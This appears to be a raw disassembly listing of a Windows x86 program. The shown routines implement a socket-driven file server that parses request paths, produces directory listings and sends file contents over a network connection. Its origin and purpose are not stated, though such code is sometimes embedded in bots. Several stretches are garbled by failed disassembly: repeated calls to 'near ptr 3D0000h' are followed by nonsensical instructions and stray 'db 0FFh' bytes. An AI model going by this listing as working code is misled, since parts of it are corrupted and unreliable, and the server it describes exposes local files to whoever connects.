lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_8]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call ds:dword_43077C
cmp eax, 0FFFFFFFFh
jz loc_403C8D
xor esi, esi
mov [ebp+var_4], esi
loc_4039B4: ; CODE XREF: sub_4038A7+3DB�j
lea eax, [ebp+var_6F0]
push eax
push esi
call ds:dword_43069C
test eax, eax
jz loc_403C78
cmp esi, [ebp+var_C]
jnz short loc_403A36
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+var_C]
call ds:dword_430824
cmp eax, 0FFFFFFFFh
jz loc_403C78
xor ecx, ecx
test ebx, ebx
jbe short loc_403A08
lea edx, [ebp+var_134]
loc_4039FC: ; CODE XREF: sub_4038A7+15F�j
cmp [edx], eax
jz short loc_403A08
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_4039FC
loc_403A08: ; CODE XREF: sub_4038A7+14D�j
; sub_4038A7+157�j
cmp ecx, ebx
jnz short loc_403A25
cmp ebx, 40h
jnb short loc_403A25
mov [ebp+ecx*4+var_134], eax
mov ebx, [ebp+var_138]
inc ebx
mov [ebp+var_138], ebx
loc_403A25: ; CODE XREF: sub_4038A7+163�j
; sub_4038A7+168�j
cmp eax, [ebp+var_8]
jbe loc_403C78
mov [ebp+var_8], eax
jmp loc_403C78
; ---------------------------------------------------------------------------
loc_403A36: ; CODE XREF: sub_4038A7+126�j
mov edi, 1000h
lea eax, [ebp+var_28F0]
push edi
push 0
push eax
call sub_410590
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_410590
add esp, 18h
lea eax, [ebp+var_28F0]
push 0
push edi
push eax
push esi
call ds:dword_4307AC
test eax, eax
jg short loc_403AC9
push esi
call ds:dword_430828
xor ecx, ecx
test ebx, ebx
jbe loc_403C78
lea eax, [ebp+var_134]
loc_403A88: ; CODE XREF: sub_4038A7+1EB�j
cmp [eax], esi
jz short loc_403A99
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_403A88
jmp loc_403C78
; ---------------------------------------------------------------------------
loc_403A99: ; CODE XREF: sub_4038A7+1E3�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_403ABD
lea eax, [ebp+ecx*4+var_134]
loc_403AA7: ; CODE XREF: sub_4038A7+214�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_403AA7
loc_403ABD: ; CODE XREF: sub_4038A7+1F7�j
dec ebx
mov [ebp+var_138], ebx
jmp loc_403C78
; ---------------------------------------------------------------------------
loc_403AC9: ; CODE XREF: sub_4038A7+1C8�j
xor esi, esi
push 104h
lea eax, [ebp+var_23C]
push esi
push eax
call sub_410590
lea eax, [ebp+var_28F0]
mov [ebp+arg_0], esi
push eax
call sub_410B60
add esp, 10h
test eax, eax
jbe loc_403C78
loc_403AF7: ; CODE XREF: sub_4038A7+309�j
mov eax, [ebp+arg_0]
mov al, [ebp+eax+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_403B9C
mov esi, offset dword_41F6B4
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_410AE0
pop ecx
test eax, eax
pop ecx
jz short loc_403B70
lea eax, [ebp+var_18F0]
push eax
call sub_410B60
cmp eax, 5
pop ecx
jbe short loc_403B70
mov eax, offset dword_41F6B0
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_410AE0
pop ecx
pop ecx
push eax
call sub_410AE0
pop ecx
pop ecx
push eax
call sub_411C60
push eax
lea eax, [ebp+var_23C]
push eax
call sub_411B70
add esp, 10h
jmp short loc_403B87
; ---------------------------------------------------------------------------
loc_403B70: ; CODE XREF: sub_4038A7+27F�j
; sub_4038A7+291�j
lea eax, [ebp+var_18F0]
push offset dword_41F6AC
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_403BBB
loc_403B87: ; CODE XREF: sub_4038A7+2C7�j
push edi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_410590
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_403B9C: ; CODE XREF: sub_4038A7+263�j
inc [ebp+arg_0]
lea eax, [ebp+var_28F0]
push eax
inc esi
call sub_410B60
cmp [ebp+arg_0], eax
pop ecx
jb loc_403AF7
jmp loc_403C78
; ---------------------------------------------------------------------------
loc_403BBB: ; CODE XREF: sub_4038A7+2DE�j
xor ecx, ecx
test ebx, ebx
jbe short loc_403C05
lea eax, [ebp+var_134]
loc_403BC7: ; CODE XREF: sub_4038A7+32D�j
mov esi, [ebp+var_4]
cmp [eax], esi
jz short loc_403BD8
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_403BC7
jmp short loc_403C08
; ---------------------------------------------------------------------------
loc_403BD8: ; CODE XREF: sub_4038A7+325�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_403BFC
lea eax, [ebp+ecx*4+var_134]
loc_403BE6: ; CODE XREF: sub_4038A7+353�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_403BE6
loc_403BFC: ; CODE XREF: sub_4038A7+336�j
dec ebx
mov [ebp+var_138], ebx
jmp short loc_403C08
; ---------------------------------------------------------------------------
loc_403C05: ; CODE XREF: sub_4038A7+318�j
mov esi, [ebp+var_4]
loc_403C08: ; CODE XREF: sub_4038A7+32F�j
; sub_4038A7+35C�j
lea eax, [ebp+var_23C]
test eax, eax
jz short loc_403C71
lea eax, [ebp+var_360]
push eax
call sub_410B60
mov edi, eax
lea eax, [ebp+var_23C]
push eax
call sub_410B60
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_403C71
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push 8004667Eh
push esi
call ds:dword_43082C
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push esi
call loc_403E84
add esp, 14h
jmp short loc_403C78
; ---------------------------------------------------------------------------
loc_403C71: ; CODE XREF: sub_4038A7+369�j
; sub_4038A7+38F�j
push esi
call ds:dword_430828
loc_403C78: ; CODE XREF: sub_4038A7+11D�j
; sub_4038A7+143�j ...
mov esi, [ebp+var_4]
inc esi
cmp esi, [ebp+var_8]
mov [ebp+var_4], esi
jbe loc_4039B4
jmp loc_40397E
; ---------------------------------------------------------------------------
loc_403C8D: ; CODE XREF: sub_4038A7+102�j
mov edi, [ebp+var_C]
xor ebx, ebx
loc_403C92: ; CODE XREF: sub_4038A7+6A�j
; sub_4038A7+92�j ...
call ds:dword_430730
push eax
lea eax, [ebp+var_8F0]
push offset dword_41F664
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_403CD8
push ebx
lea eax, [ebp+var_8F0]
push [ebp+var_250]
push eax
lea eax, [ebp+var_5E8]
push eax
push [ebp+var_5EC]
call sub_40E367
add esp, 14h
loc_403CD8: ; CODE XREF: sub_4038A7+40C�j
lea eax, [ebp+var_8F0]
push eax
call sub_407E0E
pop ecx
push edi
call ds:dword_430828
push [ebp+var_254]
call sub_4102D3
pop ecx
push ebx
call near ptr 3D0000h
pop ebp
pop edi
pop esi
pop ebx
sub_4038A7 endp ; sp-analysis failed
loc_403D02: ; DATA XREF: seg000:004040CA�o
push ebp
mov ebp, esp
mov eax, 1654h
call sub_410BE0
mov eax, [ebp+8]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp-44Ch]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp-3C8h]
push eax
lea eax, [ebp-550h]
push eax
call sub_41050B
lea eax, [ebp-2C4h]
push eax
lea eax, [ebp-654h]
push eax
call sub_41050B
xor edi, edi
add esp, 10h
cmp [ebp-0A4h], edi
jz short loc_403D67
push offset dword_41F8C4
jmp short loc_403D6C
; ---------------------------------------------------------------------------
loc_403D67: ; CODE XREF: seg000:00403D5E�j
push offset dword_41F8A8
loc_403D6C: ; CODE XREF: seg000:00403D65�j
lea eax, [ebp-9Ch]
push eax
call sub_41050B
pop ecx
lea eax, [ebp-68h]
pop ecx
mov esi, 409h
push 46h
push eax
push offset dword_41F894
push edi
push edi
push esi
call near ptr 3D0000h
db 2Eh
lea eax, [ebp-20h]
push 1Eh
push eax
push offset dword_41F888
push edi
push edi
push esi
call near ptr 3D0000h
add ecx, [ebp-427C1FBBh]
dec eax
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
; ---------------------------------------------------------------------------
call dword ptr [eax-73h]
inc ebp
cwde
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-68h]
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-68h]
push eax
jnz short loc_403DE5
lea eax, [ebp-9Ch]
push eax
lea eax, [ebp-1654h]
push offset dword_41F7AC
push eax
call sub_41050B
add esp, 24h
jmp short loc_403E06
; ---------------------------------------------------------------------------
loc_403DE5: ; CODE XREF: seg000:00403DC6�j
push dword ptr [ebp-0B8h]
lea eax, [ebp-9Ch]
push eax
lea eax, [ebp-1654h]
push offset dword_41F6BC
push eax
call sub_41050B
add esp, 28h
loc_403E06: ; CODE XREF: seg000:00403DE3�j
lea eax, [ebp-1654h]
push edi
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp-1654h]
push eax
push dword ptr [ebp-44Ch]
call ds:dword_4307E0
cmp [ebp-0A4h], edi
jnz short loc_403E46
lea eax, [ebp-550h]
push eax
push dword ptr [ebp-44Ch]
call sub_4047B6
pop ecx
pop ecx
jmp short loc_403E63
; ---------------------------------------------------------------------------
loc_403E46: ; CODE XREF: seg000:00403E2E�j
lea eax, [ebp-654h]
push eax
push edi
push dword ptr [ebp-44Ch]
lea eax, [ebp-550h]
push eax
call sub_404134
add esp, 10h
loc_403E63: ; CODE XREF: seg000:00403E44�j
push dword ptr [ebp-44Ch]
call ds:dword_430828
push dword ptr [ebp-0B4h]
call sub_4102D3
pop ecx
push edi
call near ptr 3D0000h
fstp qword ptr [edi+5Eh]
loc_403E84: ; CODE XREF: sub_4038A7+3C0�p
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp-210h]
push edi
push eax
mov [ebp-4], edi
call sub_410590
mov eax, [ebp+10h]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_403EBA
push eax
push offset dword_41F974
jmp short loc_403EC3
; ---------------------------------------------------------------------------
loc_403EBA: ; CODE XREF: seg000:00403EB0�j
push eax
mov byte ptr [eax], 5Ch
push offset dword_41F970
loc_403EC3: ; CODE XREF: seg000:00403EB8�j
lea eax, [ebp-10Ch]
push eax
call sub_41050B
add esp, 0Ch
lea eax, [ebp-10Ch]
xor esi, esi
xor ebx, ebx
push eax
call sub_410B60
test eax, eax
pop ecx
jbe short loc_403F5E
mov dword ptr [ebp+10h], 2
loc_403EEE: ; CODE XREF: seg000:00403F5C�j
lea eax, [ebp-10Ch]
push eax
call sub_410B60
cmp [ebp+10h], eax
pop ecx
jnb short loc_403F2E
cmp byte ptr [ebp+esi-10Ch], 25h
jnz short loc_403F2E
cmp byte ptr [ebp+esi-10Bh], 32h
jnz short loc_403F2E
cmp byte ptr [ebp+esi-10Ah], 30h
jnz short loc_403F2E
inc esi
mov byte ptr [ebp+ebx-210h], 20h
inc esi
add dword ptr [ebp+10h], 2
jmp short loc_403F48
; ---------------------------------------------------------------------------
loc_403F2E: ; CODE XREF: seg000:00403EFE�j
; seg000:00403F08�j ...
mov al, [ebp+esi-10Ch]
cmp al, 2Fh
jnz short loc_403F3E
push 5Ch
pop eax
jmp short loc_403F41
; ---------------------------------------------------------------------------
loc_403F3E: ; CODE XREF: seg000:00403F37�j
movsx eax, al
loc_403F41: ; CODE XREF: seg000:00403F3C�j
mov [ebp+ebx-210h], al
loc_403F48: ; CODE XREF: seg000:00403F2C�j
lea eax, [ebp-10Ch]
inc esi
inc dword ptr [ebp+10h]
push eax
inc ebx
call sub_410B60
cmp esi, eax
pop ecx
jb short loc_403EEE
loc_403F5E: ; CODE XREF: seg000:00403EE5�j
lea eax, [ebp-210h]
push eax
lea eax, [ebp-314h]
push dword ptr [ebp+0Ch]
push offset dword_41F968
push eax
call sub_41050B
lea eax, [ebp-314h]
push offset dword_41F964
push eax
call sub_411C60
add esp, 18h
lea eax, [ebp-314h]
push eax
call ds:dword_41C07C ; GetFileAttributesA
push 1
cmp eax, 10h
pop esi
jz short loc_403FAC
cmp eax, 0FFFFFFFFh
jnz short loc_403FAF
push dword ptr [ebp+8]
jmp short loc_40402B
; ---------------------------------------------------------------------------
loc_403FAC: ; CODE XREF: seg000:00403FA0�j
mov [ebp-4], esi
loc_403FAF: ; CODE XREF: seg000:00403FA5�j
cmp byte ptr [ebp+ebx-211h], 5Ch
jnz short loc_403FBC
mov [ebp-4], esi
loc_403FBC: ; CODE XREF: seg000:00403FB7�j
mov ebx, [ebp+8]
cmp [ebp-4], edi
mov [ebp-6C4h], ebx
mov [ebp-318h], edi
jz short loc_404036
cmp [ebp+14h], edi
jz short loc_40402A
lea eax, [ebp-314h]
push offset dword_41F960
push eax
call sub_411B80
lea eax, [ebp-314h]
push eax
lea eax, [ebp-640h]
push eax
call sub_41050B
lea eax, [ebp-210h]
push eax
call sub_404873
lea eax, [ebp-210h]
push eax
lea eax, [ebp-53Ch]
push eax
call sub_41050B
add esp, 1Ch
or dword ptr [ebp-330h], 0FFFFFFFFh
mov [ebp-31Ch], esi
jmp short loc_404085
; ---------------------------------------------------------------------------
loc_40402A: ; CODE XREF: seg000:00403FD3�j
push ebx
loc_40402B: ; CODE XREF: seg000:00403FAA�j
call ds:dword_430828
jmp loc_40412D
; ---------------------------------------------------------------------------
loc_404036: ; CODE XREF: seg000:00403FCE�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp-314h]
push 80000000h
push eax
call ds:dword_41C078 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_404085
lea eax, [ebp-314h]
push eax
lea eax, [ebp-640h]
push eax
call sub_41050B
pop ecx
mov [ebp-31Ch], edi
pop ecx
push edi
push esi
call near ptr 3D0000h
rcl byte ptr [esi-77h], cl
test edx, eax
cld
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
; ---------------------------------------------------------------------------
adc eax, offset dword_41C070
loc_404085: ; CODE XREF: seg000:00404028�j
; seg000:00404053�j
mov esi, [ebp+18h]
lea eax, [ebp-8C4h]
push esi
push offset dword_41F91C
push eax
call sub_41050B
push edi
lea eax, [ebp-8C4h]
push 3
push eax
call sub_40FFB7
mov [ebp-32Ch], eax
imul eax, 234h
add esp, 18h
mov ds:dword_4358DC[eax], esi
lea eax, [ebp-8]
push eax
lea eax, [ebp-6C4h]
push edi
push eax
push offset loc_403D02
push edi
push edi
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-32Ch]
imul ecx, 234h
cmp eax, edi
mov ds:dword_4358EC[ecx], eax
jz short loc_4040FF
loc_4040ED: ; CODE XREF: seg000:004040FD�j
cmp [ebp-318h], edi
jnz short loc_40412D
push 5
call ds:dword_41C058 ; Sleep
jmp short loc_4040ED
; ---------------------------------------------------------------------------
loc_4040FF: ; CODE XREF: seg000:004040EB�j
push ebx
call ds:dword_430828
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
lea eax, [ebp-8C4h]
push offset dword_41F8D0
push eax
call sub_41050B
lea eax, [ebp-8C4h]
push eax
call sub_407E0E
add esp, 10h
loc_40412D: ; CODE XREF: seg000:00404031�j
; seg000:004040F3�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404134 proc near ; CODE XREF: seg000:00403E5B�p
; seg000:0040CF7F�p
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
var_35C = byte ptr -35Ch
var_248 = byte ptr -248h
var_75 = byte ptr -75h
var_48 = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_594]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_410590
mov edi, [ebp+arg_0]
push offset dword_41F964
push edi
call sub_411C60
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_404193
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset dword_41FDC4
push esi
push eax
call sub_410A8A
add esp, 14h
jmp loc_404290
; ---------------------------------------------------------------------------
loc_404193: ; CODE XREF: sub_404134+3A�j
cmp [ebp+arg_C], ebx
push edi
jz loc_404276
call sub_410B60
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset dword_41FD84
lea eax, [ebp+var_248]
push esi
push eax
call sub_410A8A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
push edi
push offset dword_41FD58
lea eax, [ebp+var_248]
push esi
push eax
call sub_410A8A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
push edi
call sub_410B60
push 3Ch
push 96h
mov byte ptr [eax+edi], 2Ah
push 0E6h
push offset dword_41FCBC
lea eax, [ebp+var_248]
push esi
push eax
call sub_410A8A
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
push offset dword_41FC90
lea eax, [ebp+var_248]
push esi
push eax
call sub_410A8A
add esp, 0Ch
jmp short loc_404290
; ---------------------------------------------------------------------------
loc_404276: ; CODE XREF: sub_404134+63�j
mov esi, 200h
push offset dword_41FC7C
lea eax, [ebp+var_248]
push esi
push eax
call sub_410A8A
add esp, 10h
loc_404290: ; CODE XREF: sub_404134+5A�j
; sub_404134+140�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
cmp [ebp+arg_C], ebx
jz short loc_404328
push [ebp+arg_C]
call sub_410B60
cmp eax, 2
pop ecx
jbe short loc_404328
push [ebp+arg_C]
call sub_410B60
sub eax, 3
pop ecx
jz short loc_4042DC
loc_4042D0: ; CODE XREF: sub_404134+1A6�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_4042DC
dec eax
jnz short loc_4042D0
loc_4042DC: ; CODE XREF: sub_404134+19A�j
; sub_404134+1A3�j
inc eax
push eax
lea eax, [ebp+var_594]
push [ebp+arg_C]
push eax
call sub_411D00
lea eax, [ebp+var_594]
push eax
push offset dword_41FC28
lea eax, [ebp+var_248]
push esi
push eax
call sub_410A8A
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
loc_404328: ; CODE XREF: sub_404134+17E�j
; sub_404134+18C�j
lea eax, [ebp+var_388]
push eax
push edi
call ds:dword_41C090 ; FindFirstFileA
lea ecx, [ebp+var_388]
mov [ebp+arg_0], eax
push ecx
push eax
call ds:dword_41C08C ; FindNextFileA
test eax, eax
jz loc_404719
mov edi, 1FFh
loc_404354: ; CODE XREF: sub_404134+5DF�j
cmp [ebp+var_388], ebx
jz loc_404701
lea eax, [ebp+var_35C]
push offset dword_41FC24
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_404701
lea eax, [ebp+var_35C]
push offset dword_41FC20
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jz loc_404701
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call near ptr 3D0000h
push cs
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call near ptr 3D0000h
or ah, [esi-75h]
inc ebp
lock mov ecx, offset dword_41FC1C
cmp ax, 0Ch
ja short loc_4043C9
mov ecx, offset dword_41FC18
loc_4043C9: ; CODE XREF: sub_404134+28E�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_4043D5
sub eax, 0Ch
loc_4043D5: ; CODE XREF: sub_404134+29C�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+var_48]
push offset dword_41FBF8
push eax
call sub_41050B
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_404582
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_404456
lea eax, [ebp+var_35C]
push eax
push offset dword_41FBF0
lea eax, [ebp+var_490]
push 106h
push eax
call sub_410A8A
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset dword_41FBD4
push esi
push eax
call sub_410A8A
add esp, 28h
jmp loc_4046D2
; ---------------------------------------------------------------------------
loc_404456: ; CODE XREF: sub_404134+2DB�j
cmp [ebp+arg_C], ebx
jz loc_404540
push 0E6h
push offset dword_41FBB4
lea eax, [ebp+var_248]
push edi
push eax
call sub_410A8A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset dword_41FBAC
push edi
push eax
call sub_410A8A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
lea eax, [ebp+var_35C]
push eax
call sub_410B60
cmp eax, 1Eh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_4044F6
push offset dword_41FB8C
jmp short loc_4044FB
; ---------------------------------------------------------------------------
loc_4044F6: ; CODE XREF: sub_404134+3B9�j
push offset dword_41FB74
loc_4044FB: ; CODE XREF: sub_404134+3C0�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_410A8A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset dword_41FB0C
push edi
jmp loc_4046C3
; ---------------------------------------------------------------------------
loc_404540: ; CODE XREF: sub_404134+325�j
lea eax, [ebp+var_35C]
push eax
push offset dword_41FBF0
lea eax, [ebp+var_490]
push 106h
push eax
call sub_410A8A
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push offset dword_41FAFC
loc_40456D: ; CODE XREF: sub_404134+476�j
lea eax, [ebp+var_248]
push esi
push eax
call sub_410A8A
add esp, 24h
jmp loc_4046D2
; ---------------------------------------------------------------------------
loc_404582: ; CODE XREF: sub_404134+2CF�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_4045AC
push ebx
push [ebp+var_368]
call sub_40867B
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push [ebp+arg_8]
push offset dword_41FAD4
jmp short loc_40456D
; ---------------------------------------------------------------------------
loc_4045AC: ; CODE XREF: sub_404134+454�j
cmp [ebp+arg_C], ebx
jz loc_4046AC
push 0E6h
push offset dword_41FBB4
lea eax, [ebp+var_248]
push edi
push eax
call sub_410A8A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset dword_41F968
push edi
push eax
call sub_410A8A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
lea eax, [ebp+var_35C]
push eax
call sub_410B60
cmp eax, 1Fh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_40464C
push offset dword_41FAB4
jmp short loc_404651
; ---------------------------------------------------------------------------
loc_40464C: ; CODE XREF: sub_404134+50F�j
push offset dword_41FA9C
loc_404651: ; CODE XREF: sub_404134+516�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_410A8A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset dword_41FA34
lea eax, [ebp+var_248]
push edi
push eax
call sub_410A8A
add esp, 1Ch
jmp short loc_4046D2
; ---------------------------------------------------------------------------
loc_4046AC: ; CODE XREF: sub_404134+47B�j
push [ebp+var_368]
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push offset dword_41FA18
push esi
loc_4046C3: ; CODE XREF: sub_404134+407�j
lea eax, [ebp+var_248]
push eax
call sub_410A8A
add esp, 18h
loc_4046D2: ; CODE XREF: sub_404134+31D�j
; sub_404134+449�j ...
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
cmp [ebp+arg_8], ebx
jz short loc_404701
push 7D0h
call ds:dword_41C058 ; Sleep
loc_404701: ; CODE XREF: sub_404134+226�j
; sub_404134+241�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+arg_0]
call ds:dword_41C08C ; FindNextFileA
test eax, eax
jnz loc_404354
loc_404719: ; CODE XREF: sub_404134+215�j
push [ebp+arg_0]
call near ptr 3D0000h
mov cl, 39h
pop ebp
adc [ebp+esi+var_75], dh
inc ebp
clc
cdq
push edx
push eax
call sub_40867B
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_40867B
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset dword_41F9E8
push eax
call sub_41050B
add esp, 14h
jmp short loc_404790
; ---------------------------------------------------------------------------
cmp [ebp+arg_C], ebx
jz short loc_404776
lea eax, [ebp+var_248]
push offset dword_41F9A0
push eax
call sub_41050B
pop ecx
pop ecx
jmp short loc_404790
; ---------------------------------------------------------------------------
loc_404776: ; CODE XREF: sub_404134+62B�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset dword_41F978
push eax
call sub_41050B
add esp, 10h
loc_404790: ; CODE XREF: sub_404134+626�j
; sub_404134+640�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_410B60
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4307E0
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_404134 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4047B6 proc near ; CODE XREF: seg000:00403E3D�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call ds:dword_41C078 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40486E
push esi
push ebx
call near ptr 3D0000h
inc edx
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_404867
loc_4047FB: ; CODE XREF: sub_4047B6+AF�j
push 400h
lea eax, [ebp+var_404]
push esi
push eax
call sub_410590
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_404818
mov edi, [ebp+arg_4]
loc_404818: ; CODE XREF: sub_4047B6+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call ds:dword_41C098 ; SetFilePointer
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_404]
push edi
push eax
push ebx
call ds:dword_41C094 ; ReadFile
push esi
lea eax, [ebp+var_404]
push edi
push eax
push [ebp+arg_0]
call ds:dword_4307E0
cmp eax, 0FFFFFFFFh
jnz short loc_404862
call ds:dword_430730
cmp eax, 2733h
jnz short loc_404867
xor eax, eax
loc_404862: ; CODE XREF: sub_4047B6+9B�j
sub [ebp+arg_4], eax
jnz short loc_4047FB
loc_404867: ; CODE XREF: sub_4047B6+43�j
; sub_4047B6+A8�j
push ebx
call ds:dword_41C070 ; CloseHandle
loc_40486E: ; CODE XREF: sub_4047B6+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_4047B6 endp
; =============== S U B R O U T I N E =======================================
sub_404873 proc near ; CODE XREF: seg000:00404000�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_410B60
test eax, eax
pop ecx
